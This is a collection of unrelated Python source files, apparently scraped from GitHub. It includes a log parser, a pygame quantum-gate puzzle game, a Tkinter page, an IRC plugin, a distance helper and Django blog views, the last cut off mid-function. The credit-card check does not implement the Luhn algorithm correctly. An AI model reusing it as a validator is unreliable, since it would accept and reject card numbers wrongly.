Bellow variable category_delimeter, is used to determine the start/end of the category.\ncategory_delimeter = 'INFO : ----------------------------------------------------------------------------------------------'\n\nclass Query_Execution_Summary:\n\n def __init__(self):\n self.seperator_indicator = 0\n # Creation of dictionary that will be passed in the output file\n self.Query_Execution_Summary_dictionary = {}\n\n def _get_file_location(self):\n script_path = os.path.abspath(__file__)\n script_dir = os.path.split(script_path)[0] # i.e. C:\\Users\\KompocholiG\\PycharmProjects\\Beeline\\InitiationFiles\n parent_of_script_dir = Path(script_dir).parent # i.e. C:\\Users\\KompocholiG\\PycharmProjects\\Beeline\n file_path = os.path.join(parent_of_script_dir, FOLDER_NAME, FILE_NAME)\n return file_path\n\n def _read_next_line(self, input_file):\n line = input_file.readline()\n return line\n\n # check if there are still metrics for Task_Execution_Summary by verifying lines are in between of separators [------] [------]\n def _not_end_of_metrics(self):\n if self.seperator_indicator < 2:\n return True\n else:\n return False\n\n # OPERATION DURATION metrics example -> ['Compile Query', '7.43s']\n def _get_key_and_value_from_metrics(self, line):\n # ignore \"INFO : \" from line and store the rest metrics in a str to use as keys and values for dictionary\n metrics = line.replace(\"INFO : \", \"\").split()\n key = ' '.join(metrics[0:len(metrics) - 1])\n value = metrics[-1]\n return key, value\n\n def _write_dictionary_to_file(self, Query_Execution_Summary_file):\n json.dump(self.Query_Execution_Summary_dictionary, Query_Execution_Summary_file, indent=2)\n\n def create_Query_Execution_Summary_text_file(self, input_file):\n\n file_path = self._get_file_location()\n #creation of output file Query_Execution_Summary.txt\n with open(file_path, 'w') as QES_file:\n # move to next line since 'INFO : OPERATION DURATION' line won't be used for creation of dictionary\n line = self._read_next_line(input_file)\n\n # as long as there are metrics in specific category (Query Execution Summary) keep parsing lines\n while self._not_end_of_metrics() is True:\n # If line is either the start or end of category logs, store it in the seperator_indicator indicator\n if category_delimeter in line:\n self.seperator_indicator += 1\n else:\n key, value = self._get_key_and_value_from_metrics(line)\n self.Query_Execution_Summary_dictionary[key] = value\n line = self._read_next_line(input_file)\n self._write_dictionary_to_file(QES_file)\n QES_file.close()\n logging.info(\"File Query_Execution_Summary.txt created successfully\")\n","repo_name":"GinaKompocholi/ParsingFile-3NewFilesOutput","sub_path":"InitiationFiles/Query_execution_summary_File_creation.py","file_name":"Query_execution_summary_File_creation.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14585665295","text":"#!/usr/bin/env python3\nimport pygame as pg\n\nimport numpy\nfrom collections import defaultdict, OrderedDict\nfrom math import copysign\nimport pytmx\nimport time\n\nfrom sprites import * # also has getfilepath\nfrom pyquil_requests import QThread\nfrom os import path\n\nDEBUG = False\nLEVELS = 3\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nPURPLE = (160,32,240)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 
* 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"quantum freeze block\"\nBGCOLOR = DARKGREY\n\n#define grid map\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n\n# used for signalling to the event loop that the results are back\nQVMRET = pg.event.Event(pg.USEREVENT, {})\n\n#Overall game class\nclass Game:\n\n def __init__(self, qthread, level=0):\n pg.init()\n self.qthread = qthread\n # self.qthread.start()\n #Set up screen\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.level = level\n\n self.load_data()\n self.lose = False\n background_image= pg.image.load(getfilepath('snow_scene.png'))\n\n\n #Load map file into folder\n def load_data(self):\n game_folder = path.dirname(__file__)\n self.map_data = []\n self.map = TiledMap(getfilepath('game_map{}.tmx'.format(self.level)))\n\n self.map_img = self.map.make_map()\n self.map_rect = self.map_img.get_rect()\n with open(path.join(game_folder, getfilepath('map{}.txt'.format(self.level))), 'rt') as f:\n for line in f:\n self.map_data.append(line)\n\n\n def game_intro(self):\n intro = True\n if DEBUG: print(\"loading bg\")\n background_image = pg.image.load(getfilepath('snow_scene.png'))\n if DEBUG: print(\"scale bg\")\n background_image = pg.transform.scale(background_image, (1200, 774))\n while intro:\n if DEBUG: print(\"blitting\")\n self.screen.blit(background_image, [-5, -5])\n\n if DEBUG: print(\"messages\")\n self.message_to_screen(\"The Quantum Freeze\",PURPLE,(WIDTH/2),(HEIGHT/2)-100,size=\"large\")\n self.message_to_screen(\"Press space to play\", BLACK, (WIDTH/2),(HEIGHT/2)+80)\n if DEBUG: print(\"wait for event\")\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n if event.key ==pg.K_SPACE:\n intro = False\n\n pg.display.update()\n self.clock.tick(15)\n def game_instructions(self):\n instruct=True\n background_image = pg.image.load(getfilepath('snow_scene.png')).convert()\n background_image = pg.transform.scale(background_image, (1200, 774))\n while instruct:\n\n self.screen.blit(background_image,[-5,-5])\n self.message_to_screen(\"Instructions\",PURPLE,0,10,size=\"medium\",corner=\"left\")\n self.message_to_screen(\"The objective of the game is to guide your penguins\"\n , BLACK,0,150,corner=\"left\")\n self.message_to_screen(\"across the frozen lake to reach the igloos\", BLACK,0,190,corner=\"left\")\n self.message_to_screen(\"Every penguin must reach an igloo\", BLACK,0,290,corner=\"left\")\n self.message_to_screen(\"Every igloo must house at least one penguin\", BLACK,0,330,corner=\"left\")\n self.message_to_screen(\"BEWARE: the lake contains hidden holes!!!\", BLACK,0,430,corner=\"left\")\n self.message_to_screen(\"Press space to continue\", BLACK, WIDTH/2,HEIGHT/2+200)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n if event.key ==pg.K_SPACE:\n instruct = False\n\n pg.display.update()\n self.clock.tick(15)\n\n\n\n def message_to_screen(self,msg, color,pos_x,pos_y, size=\"small\",corner = \"center\"):\n if DEBUG: print(\"print msg, get text obj\")\n textSurf, textRect = self.text_objects(msg, color, size)\n if corner ==\"left\":\n textRect.x = pos_x\n textRect.y = pos_y\n else:\n textRect.center = pos_x,pos_y\n if DEBUG: print(\"blitting in msg_to_screen\")\n self.screen.blit(textSurf, textRect)\n\n def text_objects(self,text, color, size):\n if DEBUG: 
print(\"getting fornts\")\n smallerfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 37)\n smallfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 50)\n mederfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 70)\n medfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 100)\n largefont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 120)\n if size == \"smaller\":\n textSurface = smallerfont.render(text,True,color)\n elif size == \"small\":\n textSurface = smallfont.render(text, True, color)\n elif size == \"mediumer\":\n textSurface = mederfont.render(text, True, color)\n elif size == \"medium\":\n textSurface = medfont.render(text, True, color)\n elif size == \"large\":\n textSurface = largefont.render(text, True, color)\n return textSurface, textSurface.get_rect()\n # LOADING BAR DISPLAY FUNCTION\n def computing(self,dots):\n dots_progress = '.'*int(dots)\n self.message_to_screen(\"Computing\"+dots_progress, PURPLE, 8*TILESIZE+16,4*64+32,size=\"mediumer\", corner = \"left\")\n\n\n def new(self):\n\n # initialize all variables and do all the setup for a new game\n self.all_sprites = pg.sprite.Group()\n #3 distinct gate groups\n self.Igroup = pg.sprite.Group()\n self.Xgroup = pg.sprite.Group()\n self.Hgroup = pg.sprite.Group()\n # overall gate group controls drag and drop behaviour\n self.gate_group = pg.sprite.Group()\n # Gaps can be filled by gates\n self.gaps_group = pg.sprite.Group()\n self.all_qubits = pg.sprite.Group()\n # backgrounds will be tiles the penguin must stabd on\n self.backgrounds = pg.sprite.Group()\n # Penguin player group\n self.players = pg.sprite.Group()\n # igloos are endpoints\n self.igloos = pg.sprite.Group()\n self.wires = pg.sprite.Group()\n self.holes = pg.sprite.Group()\n\n self.circuit = Circuit()\n self.qubitsended = False\n self.inital_player_loc = None\n\n\n # Generate Sprites according to map entry\n itr=0\n for row, tiles in enumerate(self.map_data):\n for col, tile in enumerate(tiles):\n if tile == 'L':\n Hole(self, col, row)\n if tile == 'B':\n Background2(self, col, row)\n if tile == 'G':\n Background2(self,col,row)\n Igloo(self, col+0.25, row+0.25)\n if tile == 'P':\n #Background2(self,col,row)\n self.player_placeholder = Player(self, col+0.5, row-0.25) # move them to center of tile\n self.inital_player_loc = (col+0.5, row-0.25) # center of tile\n if tile == 'Q':\n Wire(self, col+0.5, row)\n qubit = Qubits(self, 1, col,row)\n\n if tile == 'I':\n self.Igate = Gates(self,\"I\",col,row)\n if tile == 'X':\n self.Xgate = Gates(self,\"X\",col,row)\n if tile == 'H':\n self.Hgate = Gates(self,\"H\",col,row)\n if tile == 'K':\n self.Hgate = Gates(self,\"K\",col,row)\n if tile == 'S':\n self.play_button = Play_button(self,col+0.25,row-0.25)\n if tile == 'W':\n Wire(self,col,row)\n if tile == 'A':\n gap = Gaps(self,col,row,itr)\n itr=itr+1\n if tile == 'C':\n circ(self,col,row)\n\n #for tile_object in self.map.tmxdata:\n # if tile_object.name == 'Lake':\n # print(tile_object.properties)\n # Background(self,tile_object.x,tile_object.y,tile_object.width,tile_object.height)\n\n\n\n\n def run(self):\n # game loop - set self.playing = False to end the game\n self.playing = True\n while self.playing:\n self.dt = self.clock.tick(FPS) / 1000\n self.events()\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def update(self):\n # update portion of the game loop\n\n self.all_sprites.update()\n # Kill gate on contact\n\n\n\n\n for player in self.players: #define win and lose conditions\n hitIG = 
pg.sprite.spritecollide(player, self.igloos, False)\n onlake = pg.sprite.spritecollide(player, self.backgrounds, False)\n if onlake:\n player.on_lake = 0 # onlake must be 0 else the penguin dies\n else:\n player.off_lake = 1\n if hitIG:\n player.win = True #player wins when all penguins have winPe==1\n for igloo in hitIG:\n igloo.win = True\n else:\n player.win = False\n\n\n\n\n if self.qubitsended == False and all([q.end for q in self.all_qubits.sprites()]):\n self.qubitsended = True\n # do win condition detection. Only if all the qubits have just hit the end.\n correctIglos = [pg.sprite.spritecollide(igloo, self.players,False) for igloo in self.igloos]\n\n # move penguins closer to the destination.\n # move dx, dy each timestep - if pos = dest remove dest from list.\n qubit_list = self.all_qubits.sprites()\n for index, qubit in enumerate(qubit_list):\n if index > 0:\n prev_qubit = qubit_list[index - 1]\n if prev_qubit.end == 1 and qubit.end==0:\n qubit.speedx = 5\n\n velocity = 0.1\n step = [0]*len(qubit_list)\n for index,qubit in enumerate(qubit_list):\n hit = pg.sprite.spritecollide(qubit, self.gate_group, True)\n if hit:\n qubit.step +=1\n step[index]=qubit.step\n for i, player in enumerate(self.players.sprites()):\n if player.position_targets: # have a target to aim for\n if step[index]:\n # print(\"mov peng\", i, \"of\", len(self.players.sprites()))\n (tx, ty) = player.position_targets[index+1]\n\n if abs(player.x - tx) > 0.01:\n player.dx = copysign(velocity, tx - player.x)\n else:\n player.dx = 0\n\n if abs(player.y - ty) > 0.01:\n player.dy = copysign(velocity, ty - player.y)\n else:\n player.dy = 0\n\n\n if abs(player.x - tx) < 0.01 and abs(player.y - ty) < 0.01:\n qubit.step== 0\n\n\n\n\n\n def draw_grid(self):\n for x in range(0, WIDTH, TILESIZE):\n pg.draw.line(self.screen, LIGHTGREY, (x, 0), (x, HEIGHT))\n for y in range(0, HEIGHT, TILESIZE):\n pg.draw.line(self.screen, LIGHTGREY, (0, y), (WIDTH, y))\n\n def draw(self):\n self.screen.blit(self.map_img,[0,0])\n self.holes.draw(self.screen)\n self.all_sprites.draw(self.screen)\n self.all_qubits.draw(self.screen)\n\n self.message_to_screen(\"LEVEL\", PURPLE,190,560, \"medium\")\n self.message_to_screen(\"{}\".format(self.level),PURPLE,190,648,\"large\")\n self.message_to_screen(\"Click to select gate\",PURPLE,798,80,\"smaller\")\n self.message_to_screen(\"then click gap to move\",PURPLE,799,120,\"smaller\")\n self.message_to_screen(\"Hit play to run circuit\",PURPLE,798,160,\"smaller\")\n player_list = self.players.sprites()\n igloo_list = self.igloos.sprites()\n qubit_list = self.all_qubits.sprites()\n\n # LOADING BAR\n if self.player_placeholder.load:\n time_count = 0.3\n self.computing(self.player_placeholder.dots)\n self.player_placeholder.dots += 1\n if self.player_placeholder.dots ==4:\n self.player_placeholder.dots = 1\n time.sleep(time_count)\n for player in self.players:\n hit_hole = pg.sprite.spritecollide(player, self.holes, False)\n\n if hit_hole:\n # player.kill() eventually.\n for hole in hit_hole:\n self.wires.add(hole)\n if hole.hit == False:\n hole.hitting_time = pg.time.get_ticks()\n hole.hit= True\n\n now = pg.time.get_ticks()\n if now - hole.hitting_time>100:\n self.wires.draw(self.screen)\n if now - hole.hitting_time>950:\n self.play_again_lose()\n self.playing = False\n self.wires.draw(self.screen)\n if player.off_lake ==1:\n self.play_again_lose()\n self.lose = True\n if all( player.win is True for player in player_list) and all( igloo.win is True for igloo in igloo_list):\n if all( qubit.end is True for 
qubit in qubit_list):\n self.screen.fill(WHITE)\n self.play_again_win()\n elif all( qubit.end is True for qubit in qubit_list):\n self.lose = True\n self.play_again_lose()\n\n\n now = pg.time.get_ticks()\n if self.lose:\n time_count = 1\n time.sleep(time_count)\n self.playing = False\n\n\n pg.display.flip()\n\n def mesurement_callback(self, msmt_outcomes):\n print(\"sending event notification\")\n print(\"recv final states\", msmt_outcomes)\n self.msmt_outcomes = msmt_outcomes\n pg.event.post(QVMRET)\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n #print(\"got event of type\", event.type)\n if event.type == pg.QUIT:\n self.quit()\n if event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n\n if event.button == 1:\n\n # if click play set qubit moving and build up circuit\n if self.play_button.rect.collidepoint(pos):\n self.play_button.kill()\n self.player_placeholder.load +=1\n\n # call out to the bg thread to run the circuit\n #\n self.qthread.build_circuit(self.circuit.qubit_operation)\n try:\n self.qthread.execute(callback=self.mesurement_callback)\n except Exception as e:\n print(e)\n\n # control placement behaviour of the gates\n for gate in self.gate_group:\n now = pg.time.get_ticks()\n if gate.rect.collidepoint(pos) and gate.clicked==False:\n gate.clicked = True\n gate.click_time = now\n if gate.type == \"I\":\n gate.image = pg.image.load(getfilepath('Igate_pressed.png'))\n elif gate.type == \"X\":\n gate.image = pg.image.load(getfilepath('Xgate_pressed.png'))\n elif gate.type == \"H\":\n gate.image = pg.image.load(getfilepath('Hgate_pressed.png'))\n elif gate.type == \"K\":\n gate.image = pg.image.load(getfilepath('CXgate_pressed.png'))\n\n\n for gap in self.gaps_group:\n if gap.rect.collidepoint(pos) and gate.clicked == True:\n gate_start_x = gate.rect.x/TILESIZE\n gate_start_y = gate.rect.y/TILESIZE\n gate.clicked = False\n Gates(self,gate.type,gate_start_x,gate_start_y)\n gate_x = gap.rect.x/TILESIZE\n gate_y = gap.rect.y/TILESIZE\n Gates(self,gate.type,gate_x,gate_y)\n gate.kill()\n self.gate_group.draw(self.screen)\n\n\n #gate.clicked = False\n\n self.circuit.qubit_operation[gap.id]=gate.type\n gap.kill()\n if now-gate.click_time >10 and gate.clicked==True:\n gate.clicked=False\n Gates(self,gate.type,gate.x,gate.y)\n gate.kill()\n\n\n\n if event.type == QVMRET.type:\n self.player_placeholder.load = False\n \"\"\"Runs the main game loop - processes the quantum sample list\n from the QVM, and instructs the penguins etc to play out the results.\n \"\"\"\n self.player_placeholder.kill()\n qubit_list = self.all_qubits.sprites()\n for index,qubit in enumerate(qubit_list):\n if index == 0:\n qubit.speedx = 5\n else:\n prev_qubit=qubit_list[index-1]\n if prev_qubit.end==1:\n qubit.speedx = 5\n\n print(self.players)\n msmt_outcomes = self.msmt_outcomes # saved by the callback\n msmt_outcomes = [tuple(msmt) for msmt in msmt_outcomes]\n\n # x=set(x)\n # the defaultdict holds 0 in all key locations - we then\n # incriment each observed sample so we know the relative\n # amplitude for each penguin. relative final amp. 
the prefix\n # needs to be the sum of amps at that point.\n x = defaultdict(lambda: 0)\n for sample in msmt_outcomes:\n x[sample] += (1./len(msmt_outcomes))\n # move penguin according to mmt outcomes.\n #\n # test with only the first msmnt outcome\n self.players.empty()\n for pidx in range(len(x.keys())): # additional players\n Player(self, *self.inital_player_loc)\n print(\"no unique paths:\", len(self.players.sprites()))\n\n # need a list of steps.\n # [ [(x, y, weight)], [(x, y, weight), (x, y, weight)] ... ]\n\n # each element of this list is a map of locations -> amplitude for\n # the penguins after gate i.\n print(\"walking the penguins\")\n paths = [OrderedDict() for _ in range(len(msmt_outcomes[0]))]\n for path in paths:\n path[(0, 0)] = 1./len(msmt_outcomes)\n\n\n for pengidx, (path, weight) in enumerate(x.items()):\n px, py = 0, 0\n for step in path:\n if step == 1:\n px += 2\n else:\n py += 2\n paths[pengidx][(px, py)] = paths[pengidx].get((px, py), 0) + weight\n\n pathlists = [path.keys() for path in paths]\n print(\"penguin paths\", pathlists)\n for penguin, path in zip(self.players.sprites(), pathlists):\n penguin.add_target_walk(path)\n\n\n def show_start_screen(self):\n pass\n # if win display congrats and ask to play again\n def play_again_win(self):\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('Congrats!', 13, PURPLE)\n text2 = bigfont.render('Press space to continue', 13, PURPLE)\n textx = WIDTH / 2 - text.get_width() / 2\n texty = HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n -64+HEIGHT / 2 - text.get_height() / 2))\n self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,\n\n 100-64 + HEIGHT / 2 - text2.get_height() / 2))\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n pos = pg.mouse.get_pos()\n if event.key ==pg.K_SPACE:\n g = Game(level=(self.level+1) % LEVELS, qthread=self.qthread)\n g.show_start_screen()\n while True:\n g.new()\n g.run()\n g.show_go_screen()\n # if lose repeat as above but display lose\n def play_again_lose(self):\n self.screen.fill(WHITE)\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('You lose!', 13, PURPLE)\n text2 = bigfont.render('Press space to play again', 13, PURPLE)\n textx = WIDTH / 2 - text.get_width() / 2\n texty = HEIGHT / 2 - text.get_height() / 2\n textx_size = text.get_width()\n texty_size = text.get_height()\n pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n -64 +HEIGHT / 2 - text.get_height() / 2))\n\n self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,100 -64 + HEIGHT / 2 - text2.get_height() / 2))\n\n for event in pg.event.get():\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n quit()\n if event.type == pg.KEYDOWN:\n pos = pg.mouse.get_pos()\n if event.key ==pg.K_SPACE:\n g = Game(qthread=self.qthread, level=self.level)\n g.show_start_screen()\n while True:\n g.new()\n g.run()\n g.show_go_screen()\n\n\n\n\n def show_go_screen(self):\n play_again=True\n while play_again:\n self.screen.fill(WHITE)\n bigfont = pg.font.Font(getfilepath('Iceland-Regular.ttf'), 80)\n text = bigfont.render('You lose!', 13, 
PURPLE)\n            text2 = bigfont.render('Press space to play again', 13, PURPLE)\n            textx = WIDTH / 2 - text.get_width() / 2\n            texty = HEIGHT / 2 - text.get_height() / 2\n            textx_size = text.get_width()\n            texty_size = text.get_height()\n            pg.draw.rect(self.screen, (255,255,255), ((textx - 5, texty - 5),(textx_size + 10, texty_size +10)))\n\n\n            self.screen.blit(text, (WIDTH / 2 - text.get_width() / 2,\n\n                                    -64+HEIGHT / 2 - text.get_height() / 2))\n            self.screen.blit(text2, (WIDTH / 2 - text2.get_width() / 2,100-64 + HEIGHT / 2 - text2.get_height() / 2))\n\n            pg.display.flip()\n\n            for event in pg.event.get():\n                if event.type == pg.QUIT:\n                    pg.quit()\n                    quit()\n                if event.type == pg.KEYDOWN:\n                    pos = pg.mouse.get_pos()\n                    if event.key ==pg.K_SPACE:\n                        g = Game(qthread=self.qthread)\n                        g.show_start_screen()\n                        while True:\n                            g.new()\n                            g.run()\n                            g.show_go_screen()\n\ndef quit():\n    sys.exit(0)\n\ntry:\n    level_idx = sys.argv.index(\"-l\")+1\n    level = int(sys.argv[level_idx])\nexcept ValueError:\n    level = 0\n# create the game object\nprint(\"created game\")\nqthread = QThread()\nprint(\"started game\")\n\nqthread.start()\ng = Game(qthread=qthread, level=level)\nprint(\"showing start screen\")\ng.show_start_screen()\n# # Game loop\nwhile True:\n    try:\n        g.game_intro()\n        g.game_instructions()\n        g.new()\n        g.run()\n        g.show_go_screen()\n    except Exception as e:\n        if DEBUG:\n            raise e\n","repo_name":"riverlane/quantum-freeze","sub_path":"quantum-freeze.py","file_name":"quantum-freeze.py","file_ext":"py","file_size_in_byte":25858,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"71523330706","text":"#Rehan Javaid rj3dxu\r\ndef check (num):\r\n    \"\"\"\r\n    The purpose of this function is to determine whether or not an input represents a valid credit card number based on calculations\r\n    :param num: Any positive integer\r\n    :return: if the integer is less than 10 or the value obtained from the function's calculations is not divisible by 10, the function returns false\r\n    otherwise the function will return true if the value obtained from the function's calculations is divisible by 10\r\n    \"\"\"\r\n    if num < 10:\r\n        return False\r\n    num = str(num)\r\n    new_list = []\r\n    for i in range(int(num[0]), int(num[-1])):\r\n        a = 2*int(num[i])\r\n        i+=2\r\n        new_list.append(a)\r\n        continue\r\n    addition_multiply2 = sum(new_list)\r\n    new_list2 = []\r\n    for i in range(int(num[0]), int(num[-1])):\r\n        b = int(num[i+1])\r\n        i+=2\r\n        new_list2.append(b)\r\n        continue\r\n    addition = sum(new_list2)\r\n    test_value = addition + addition_multiply2\r\n    if test_value % 10 == 0:\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\n","repo_name":"rehanjavaid2001/CreditCardValidityCheck","sub_path":"credit_card.py","file_name":"credit_card.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38029300438","text":"from Tkinter import *\nimport ttk, login_util, WattTime_Util, Query, PageFive\n\nimport Tkinter as tk\n\nclass PageTwo(tk.Frame):\n\n    def __init__(self, parent, controller):\n        # global WattTime_Util.current_tariff\n        tk.Frame.__init__(self, parent)\n        label = tk.Label(self, text=\"Current Tariff\", font=WattTime_Util.LARGE_FONT)\n        label.pack(pady=10,padx=10)\n\n        sublabel = tk.Label(self, text=\"Your current tariff is \"+str(WattTime_Util.current_tariff), font=WattTime_Util.SMALL_FONT)\n        sublabel.pack(pady=10,padx=10)\n\n        button1 = tk.Button(self, text=\"Change Tariff\",\n                            command=lambda: 
controller.show_frame(PageFive.PageFive))\n button1.pack()\n\n button2 = tk.Button(self, text=\"Back to Home\",\n command=lambda: controller.show_frame(Query.Query))\n button2.pack()\n","repo_name":"sbilich/EDF_WattTime","sub_path":"PageTwo.py","file_name":"PageTwo.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27679025098","text":"import math\n\n\ndef get_spherical_distance(lat1, lon1, lat2, lon2):\n def rad(x):\n return x * math.pi / 180\n R = 6371e3\n fi1 = rad(lat1)\n fi2 = rad(lat2)\n delta_fi = rad(lat2-lat1)\n delta_lambda = rad(lon2-lon1)\n a = (math.sin(delta_fi / 2) ** 2) + \\\n math.cos(fi1) * math.cos(fi2) * \\\n (math.sin(delta_lambda / 2) ** 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n return R * c / 1000 # km\n","repo_name":"hatomist/admissions-queue","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9598394542","text":"from core import Plugin\nfrom sqlalchemy import create_engine, Table, Column, Integer, Unicode, MetaData, DateTime\nfrom sqlalchemy.orm import mapper, sessionmaker\nfrom datetime import datetime\nimport re\n\nclass Seen(Plugin):\n\n def __init__(self, factory):\n Plugin.__init__(self, factory)\n self.channel_message_rule = \".*?\"\n\n def on_channel_message(self, vtkbot, nick, nickmask, hostmask, channel, message, match):\n session = self.Session()\n occurrence = session.query(Occurrence).filter_by(user=nick).first()\n if not occurrence:\n occurrence = Occurrence(nick, channel, datetime.now())\n else:\n occurrence.datetime = datetime.now()\n session.save_or_update(occurrence)\n session.commit()\n match = re.match(\"%s: seen ([^\\s]*)\" % self.factory.nickname, message)\n if match:\n occurrence = session.query(Occurrence).filter_by(user=match.group(1)).first()\n if occurrence:\n vtkbot.send_channel_message(channel, \"Ik zag %s het laatst %s\" % (occurrence.user, occurrence.datetime))\n else:\n vtkbot.send_channel_message(channel, \"Ik heb %s nog nooit gezien!\" % match.group(1))\n\n def create_database_tables(self):\n metadata = MetaData()\n #Create SQL tables\n occurrence_table = Table('seen', metadata,\n Column('id', Integer, primary_key=True),\n Column('user', Unicode(length=35)),\n Column('channel', Unicode(length=100)),\n Column('datetime', DateTime),\n )\n mapper(Occurrence, occurrence_table)\n metadata.create_all(self.factory.engine)\n self.Session = sessionmaker(bind=self.factory.engine)\n\n def on_help(self, vtkbot, channel):\n vtkbot.send_channel_message(channel, \"Seen is handig als je wil weten wanneer een gebruiker laatst online was: '%s: seen Gebruiker'\" % self.factory.nickname)\n\nclass Occurrence(object):\n def __init__(self, user, channel, datetime):\n self.user = user\n self.channel = channel\n self.datetime = datetime\n\n def __repr__(self):\n return u'<Occurrence %s in %s at %s>' % (self.user, self.channel, self.datetime)\n","repo_name":"Mathiasdm/VTKBot","sub_path":"plugins/seen.py","file_name":"seen.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1061709192","text":"import datetime\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404\nfrom .models import Post, 
Category\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom .forms import NewUserForm\n\nfrom django.contrib import messages\n\nfrom .forms import PostForm\nfrom .forms import EditForm\n\nfrom django.urls import reverse\nfrom django.template import loader\n\n\n# Create your views here.\ndef index(request):\n post_list = Post.objects.order_by('-pub_date')[:20]\n categories_list = Category.objects.all()\n context = {\n 'post_list': post_list,\n 'categories_list': categories_list,\n }\n return render(request, 'blog/index.html', context)\n\n\ndef post(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n context = {\n 'post': post,\n }\n return render(request, 'blog/post.html', context)\ndef category_posts(request, category_id):\n category = Category.objects.filter(id=category_id)[0]\n posts = Post.objects.filter(category = category_id)\n categories_list = Category.objects.all()\n context = {\n 'post_list': posts,\n 'category':category,\n 'categories_list':categories_list,\n }\n return render(request, 'blog/category_posts.html', context)\n\ndef register_request(request):\n if request.method == \"POST\":\n form = NewUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, \"Registration successful\")\n return redirect(\"blog:index\")\n messages.error(request, \"Unsuccessful registration.\")\n form = NewUserForm()\n return render(request=request, template_name=\"blog/register.html\", context={\"register_form\": form})\n\n\ndef login_request(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"blog:index\")\n else:\n messages.error(request, \"Invalid username or password.\")\n else:\n messages.error(request, \"Invalid username or password.\")\n form = AuthenticationForm()\n return render(request=request, template_name=\"blog/login.html\", context={\"login_form\": form})\n\n\ndef create_post(request):\n user = request.user\n if not user.is_authenticated:\n return redirect('blog:index')\n\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n author = user\n obj.author = author\n obj.pub_date = datetime.datetime.now()\n\n obj.save()\n form = PostForm()\n context = {\n \"form\": form,\n }\n return render(request, \"blog/create_post.html\", context)\n\n\ndef edit_post(request, post_id=None):\n user = request.user\n if post_id:\n post = get_object_or_404(Post, pk=post_id)\n if post.author != request.user:\n return HttpResponseForbidden()\n else:\n post = Post(author=request.user)\n form = EditForm(request.POST or None, request.FILES or None, instance=post)\n if request.POST and form.is_valid():\n obj = form.save(commit=False)\n author = user\n obj.author = author\n obj.pub_date = datetime.datetime.now()\n obj.save()\n redirect_url = reverse(\"blog:index\")\n return redirect(redirect_url)\n context = {\n \"form\": form,\n }\n return render(request, \"blog/edit_post.html\", context)\n\n\ndef delete_post(request, post_id=None):\n user = request.user\n if post_id:\n post = get_object_or_404(Post, pk=post_id)\n if post.author != 
